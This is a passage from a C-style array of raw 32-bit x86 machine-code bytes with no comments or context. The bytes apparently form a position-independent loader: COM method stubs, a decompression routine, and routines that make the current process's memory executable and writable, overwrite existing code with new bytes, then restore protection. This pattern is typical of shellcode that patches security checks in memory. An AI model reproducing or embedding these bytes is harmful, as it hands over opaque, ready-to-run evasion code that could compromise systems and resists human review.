1609 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x08, 0x8b,
1610 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc2, 0x10,
1611 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1612 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08,
1613 0x8b, 0x4d, 0x1c, 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x14, 0x89, 0x4c,
1614 0x24, 0x08, 0x8b, 0x4d, 0x10, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24,
1615 0xff, 0xd0, 0x83, 0xec, 0x10, 0xc9, 0xc2, 0x18, 0x00, 0x55, 0x89, 0xe5,
1616 0x53, 0x83, 0xec, 0x44, 0x8b, 0x45, 0x18, 0x66, 0x89, 0x45, 0xe4, 0x8b,
1617 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x0f, 0xb7,
1618 0x4d, 0xe4, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x8b, 0x5d, 0x28, 0x89,
1619 0x5c, 0x24, 0x1c, 0x8b, 0x5d, 0x24, 0x89, 0x5c, 0x24, 0x18, 0x8b, 0x5d,
1620 0x20, 0x89, 0x5c, 0x24, 0x14, 0x8b, 0x5d, 0x1c, 0x89, 0x5c, 0x24, 0x10,
1621 0x89, 0x4c, 0x24, 0x0c, 0x8b, 0x4d, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8b,
1622 0x4d, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1623 0xec, 0x20, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9,
1624 0xc2, 0x24, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1625 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1626 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1627 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1628 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1629 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x0c,
1630 0x66, 0x89, 0x45, 0xfc, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x08,
1631 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1632 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x38, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x0c,
1633 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1634 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xfd, 0xff, 0xff, 0xff,
1635 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0xb8, 0x00, 0x00, 0x00,
1636 0x00, 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1637 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1638 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1639 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1640 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1641 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1642 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1643 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1644 0x80, 0x5d, 0xc2, 0x10, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1645 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1646 0x80, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1647 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b,
1648 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x0c, 0x89,
1649 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00,
1650 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1651 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1652 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1653 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1654 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x1c, 0xc7, 0x00,
1655 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x18,
1656 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x08, 0x0f, 0xaf, 0x45, 0x0c, 0x5d,
1657 0xc3, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x00, 0x00, 0x00,
1658 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89,
1659 0xe5, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x5d, 0xc3, 0x55,
1660 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01,
1661 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b,
1662 0x45, 0x08, 0x05, 0x28, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1663 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xa2, 0xbf, 0xff, 0xff, 0x89, 0x45,
1664 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00,
1665 0xe9, 0x02, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05, 0x9c, 0x05, 0x00,
1666 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1667 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1668 0x04, 0x24, 0xe8, 0x10, 0xbd, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1669 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x01,
1670 0x00, 0x00, 0xb8, 0x89, 0x5d, 0x40, 0x00, 0xba, 0x74, 0x5d, 0x40, 0x00,
1671 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x85, 0xc0, 0x79, 0x0a,
1672 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x01, 0x00, 0x00, 0x8b, 0x45,
1673 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xd8, 0x8b, 0x45,
1674 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x10,
1675 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd8, 0x89,
1676 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1677 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0b, 0x00, 0x00, 0x89, 0x45,
1678 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
1679 0xe9, 0x5a, 0x01, 0x00, 0x00, 0xe8, 0x6e, 0x02, 0x00, 0x00, 0xba, 0x74,
1680 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1681 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b,
1682 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x90, 0x05, 0x00, 0x00, 0x8b, 0x45,
1683 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc, 0x89,
1684 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89, 0x44,
1685 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1686 0xff, 0xff, 0xff, 0xff, 0xe8, 0x69, 0x0b, 0x00, 0x00, 0x8b, 0x45, 0x08,
1687 0x05, 0xac, 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00,
1688 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04,
1689 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x10, 0xbc, 0xff, 0xff, 0x89,
1690 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1691 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0xb8, 0xaa, 0x5d, 0x40, 0x00, 0xba,
1692 0x95, 0x5d, 0x40, 0x00, 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
1693 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x00,
1694 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89,
1695 0x45, 0xd8, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0,
1696 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00,
1697 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44,
1698 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0a,
1699 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8,
1700 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5d, 0xe8, 0x71, 0x01, 0x00, 0x00, 0xba,
1701 0x95, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1702 0xc2, 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
1703 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x93, 0x04, 0x00, 0x00, 0x8b,
1704 0x45, 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc,
1705 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89,
1706 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1707 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6c, 0x0a, 0x00, 0x00, 0xb8, 0x01,
1708 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x00, 0x00,
1709 0x00, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48, 0x8b, 0x45, 0x08,
1710 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1711 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x05, 0x3c, 0x03, 0x00, 0x00, 0x89,
1712 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xbd,
1713 0xff, 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x05, 0xbc, 0x05, 0x00,
1714 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1715 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1716 0x04, 0x24, 0xe8, 0xd0, 0xba, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1717 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x00,
1718 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xdc, 0x04,
1719 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45,
1720 0xe4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00,
1721 0x00, 0x8d, 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89,
1722 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb3,
1723 0x09, 0x00, 0x00, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x79, 0x07,
1724 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x53, 0x8b, 0x45, 0x08, 0x05, 0xe1,
1725 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x04, 0x00, 0x00, 0x00, 0x89,
1726 0x44, 0x24, 0x04, 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x7c, 0x03,
1727 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14,
1728 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d,
1729 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24,
1730 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x55, 0x09, 0x00,
1731 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0xe8, 0x00, 0x00, 0x00,
1732 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1733 0xec, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x0c, 0x8d, 0x48, 0xff, 0x8b,
1734 0x55, 0x08, 0x89, 0x4a, 0x0c, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45, 0x08,
1735 0x8b, 0x00, 0x8d, 0x48, 0x01, 0x8b, 0x55, 0x08, 0x89, 0x0a, 0x0f, 0xb6,
1736 0x00, 0x0f, 0xb6, 0xd0, 0x8b, 0x45, 0x08, 0x89, 0x50, 0x08, 0x8b, 0x45,
1737 0x08, 0xc7, 0x40, 0x0c, 0x07, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
1738 0x40, 0x08, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01, 0x89, 0x45, 0xfc, 0x8b,
1739 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0x08, 0x89,
1740 0x50, 0x08, 0x8b, 0x45, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83,
1741 0xec, 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8,
1742 0x8d, 0x1c, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x82, 0xff,
1743 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x08, 0x89, 0x04,
1744 0x24, 0xe8, 0x72, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdb, 0x8b, 0x45,
1745 0xf8, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
1746 0x34, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x0c, 0x89, 0x45,
1747 0xd8, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0xff,
1748 0xff, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1749 0xe8, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89,
1750 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f,
1751 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x0f, 0x02, 0x00, 0x00, 0x8d, 0x45, 0xd4,
1752 0x89, 0x04, 0x24, 0xe8, 0x10, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1753 0xde, 0x01, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xfd,
1754 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xe3, 0x00, 0x00, 0x00, 0x8d,
1755 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xea, 0xfe, 0xff, 0xff, 0x85, 0xc0,
1756 0x74, 0x6b, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4,
1757 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1a, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x00,
1758 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0xfe, 0xff, 0xff, 0x01,
1759 0xd8, 0x89, 0x45, 0xf8, 0x83, 0x6d, 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00,
1760 0x75, 0xe0, 0x83, 0x7d, 0xf8, 0x00, 0x74, 0x1d, 0x8b, 0x55, 0xd8, 0x8b,
1761 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12,
1762 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0xeb,
1763 0x0c, 0x8b, 0x45, 0xd8, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd8, 0xc6, 0x00,
1764 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x6f, 0x01, 0x00,
1765 0x00, 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6,
1766 0x00, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x83, 0xe0,
1767 0x01, 0x83, 0xc0, 0x02, 0x89, 0x45, 0xf4, 0xd1, 0x6d, 0xf8, 0x83, 0x7d,
1768 0xf8, 0x00, 0x74, 0x29, 0xeb, 0x1f, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf8,
1769 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
1770 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0x83, 0x6d, 0xf4,
1771 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xeb, 0x07, 0xc7, 0x45, 0xe8,
1772 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45,
1773 0xec, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x45,
1774 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
1775 0x83, 0x7d, 0xec, 0x00, 0x75, 0x46, 0x83, 0x7d, 0xf8, 0x02, 0x75, 0x40,
1776 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1777 0xe8, 0x46, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf4, 0xeb, 0x1f, 0x8b, 0x55,
1778 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1779 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1780 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xe9,
1781 0x85, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x06, 0x83, 0x6d,
1782 0xf8, 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xf8, 0x02, 0xc1, 0x65, 0xf8, 0x08,
1783 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6, 0x00,
1784 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1785 0xe8, 0xe6, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf4, 0x81, 0x7d, 0xf8, 0xff,
1786 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x81, 0x7d, 0xf8,
1787 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d,
1788 0xf8, 0x7f, 0x77, 0x25, 0x83, 0x45, 0xf4, 0x02, 0xeb, 0x1f, 0x8b, 0x55,
1789 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1790 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1791 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0x8b,
1792 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xec, 0x01, 0x00, 0x00, 0x00,
1793 0xeb, 0x1e, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89, 0x45, 0xd4, 0x8b,
1794 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f, 0xb6, 0x12, 0x88,
1795 0x10, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe8, 0x00,
1796 0x0f, 0x84, 0xe7, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x2b, 0x45, 0x0c,
1797 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x90, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1798 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0xeb, 0x0e, 0x8b, 0x45,
1799 0x0c, 0x89, 0xc2, 0x8b, 0x45, 0xfc, 0x88, 0x10, 0x83, 0x45, 0xfc, 0x01,
1800 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75,
1801 0xe5, 0x8b, 0x45, 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10,
1802 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf8,
1803 0xeb, 0x13, 0x8b, 0x45, 0xf8, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xfc, 0x88,
1804 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x45, 0xf8, 0x01, 0x8b, 0x45, 0x10,
1805 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xe0, 0x8b, 0x45,
1806 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x8b, 0x5d, 0x08, 0x8b,
1807 0x75, 0x0c, 0xeb, 0x32, 0x89, 0xd8, 0x8d, 0x58, 0x01, 0x0f, 0xb6, 0x10,
1808 0x89, 0xf0, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x1e,
1809 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00,
1810 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8,
1811 0x01, 0x00, 0x00, 0x00, 0xeb, 0x12, 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff,
1812 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xc1, 0xb8, 0x00, 0x00, 0x00, 0x00,
1813 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x1f, 0x8b, 0x45, 0x08,
1814 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74,
1815 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1816 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1817 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xcd,
1818 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1819 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xeb, 0x2f,
1820 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00,
1821 0x38, 0xc2, 0x75, 0x1b, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b,
1822 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x8e, 0xff, 0xff, 0xff, 0x85, 0xc0,
1823 0x74, 0x05, 0x8b, 0x45, 0x08, 0xeb, 0x13, 0x83, 0x45, 0x08, 0x01, 0x8b,
1824 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0xb8, 0x00, 0x00,
1825 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x18, 0x8b, 0x45, 0x08,
1826 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x75,
1827 0x1e, 0x83, 0x45, 0x08, 0x01, 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08,
1828 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0d, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
1829 0x00, 0x84, 0xc0, 0x75, 0xd4, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x08, 0x0f,
1830 0xb6, 0x00, 0x0f, 0xbe, 0xd0, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x0f,
